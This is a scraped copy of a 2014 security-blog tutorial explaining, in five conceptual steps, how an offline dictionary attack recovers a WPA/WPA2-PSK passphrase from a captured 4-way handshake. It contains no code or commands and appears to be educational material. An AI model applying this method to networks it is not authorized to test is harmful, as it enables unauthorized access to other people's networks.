Wi-Fu - Attacking WPA-PSK - Part 2

download Wi-Fu - Attacking WPA-PSK - Part 2

of 2

description

Wi-Fu - Attacking WPA-PSK - Part 2

Transcript of Wi-Fu - Attacking WPA-PSK - Part 2

  • 5/21/2018 Wi-Fu - Attacking WPA-PSK - Part 2

    1/3

    You are here: Home // Wi-Fi // WPA Attacks // Attacking WPA-PSK - Part 2 AAA

    Home Intelligence Gathering Wi-Fi Vulnerable by Design Misc Contact

    Search...

    MostRead in Wi-Fi

    Attacking WPA-PSK

    Without Wireless

    Clients

    WPA2-PSK Evil Twin

    Attack

    WPA2-PSK Rainbow

    Table Attack

    Wi-Fi Protected Setup

    KoreK's ChopChop

    Attack - Part 1

    Attacking WPA-PSK - Part 2

    Details

    Category: WPA/2

    Published on Saturday, 18 January 2014 19:30

    Recap

    The image below s hows a basic flow of the information required to derive the

    PSK and PTK for a WPA network.

    There is a lot of information that goes between the wireless client and access

    point. But when you think about it, you will realise that all of these parameters,

    bar one, is sent in plaintext. An attacker silently sniffing the network traffic will

    learn of all these values, except the original passphrase entered by the user.

    Bruteforce

    Due to the high-computational tasks to be carried out, the process of

    bruteforcing the passphrase is rather slow.

    1. The attacker makes a guess at the passphrase (from a dictionary

    or other wordlist source)

    2. This passphrase is used with the SSID and put through the

    PBKDF2 function, producing a PSK (which may or may not be

    correct)

    3. This PSK is used with the captured information from the 4-way

    handshake and put through the PBKDF2 function again. This

    produces a PTK.

    4. The attacker uses this information to calculate a MIC - which is

    then checked against the MIC in the captured packets.

    5. If the MIC matches, the original passphrase was correct; if not the

    entire process is repeated with the next passphrase.

    http://wi-fu.co.uk/wi-fi/wpa-attacks/106-wpa2-psk-rainbow-table-attackhttp://wi-fu.co.uk/wi-fi/wpa-attacks/109-attacking-wpa-psk-without-wireless-clientshttp://wi-fu.co.uk/wi-fi/wpa-attacks/95-attacking-wpa-psk-part-2http://wi-fu.co.uk/wi-fi/wep-attacks/87-korek-s-chopchop-attack-part-1http://wi-fu.co.uk/wi-fi/wpa-attacks/107-wi-fi-protected-setuphttp://wi-fu.co.uk/wi-fi/wpa-attacks/106-wpa2-psk-rainbow-table-attackhttp://wi-fu.co.uk/wi-fi/wpa-attacks/108-wpa2-psk-evil-twin-attackhttp://wi-fu.co.uk/wi-fi/wpa-attacks/109-attacking-wpa-psk-without-wireless-clientshttp://wi-fu.co.uk/contacthttp://wi-fu.co.uk/mischttp://wi-fu.co.uk/vulnerable-by-designhttp://wi-fu.co.uk/wifihttp://wi-fu.co.uk/intelligence-gatheringhttp://wi-fu.co.uk/http://wi-fu.co.uk/wi-fi/wpa-attackshttp://wi-fu.co.uk/wifihttp://wi-fu.co.uk/
  • 5/21/2018 Wi-Fu - Attacking WPA-PSK - Part 2

    2/3

    Copyright 2014 - Material is f or educational purposes only

    JC omments

    < Prev Next >

    A Word on WPA2-PSK

    Even though WPA2 us es different encryption schemes and functions;

    because what we are really attacking is a weak pass phrase, the attack

    process for WPA2 is identical to WPA.

    Add comment

    http://wi-fu.co.uk/wi-fi/wpa-attacks/96-wpa2-psk-dictionary-attackhttp://wi-fu.co.uk/wi-fi/wpa-attacks/94-attacking-wpa-psk-part-1http://www.joomlatune.com/
  • 5/21/2018 Wi-Fu - Attacking WPA-PSK - Part 2

    3/3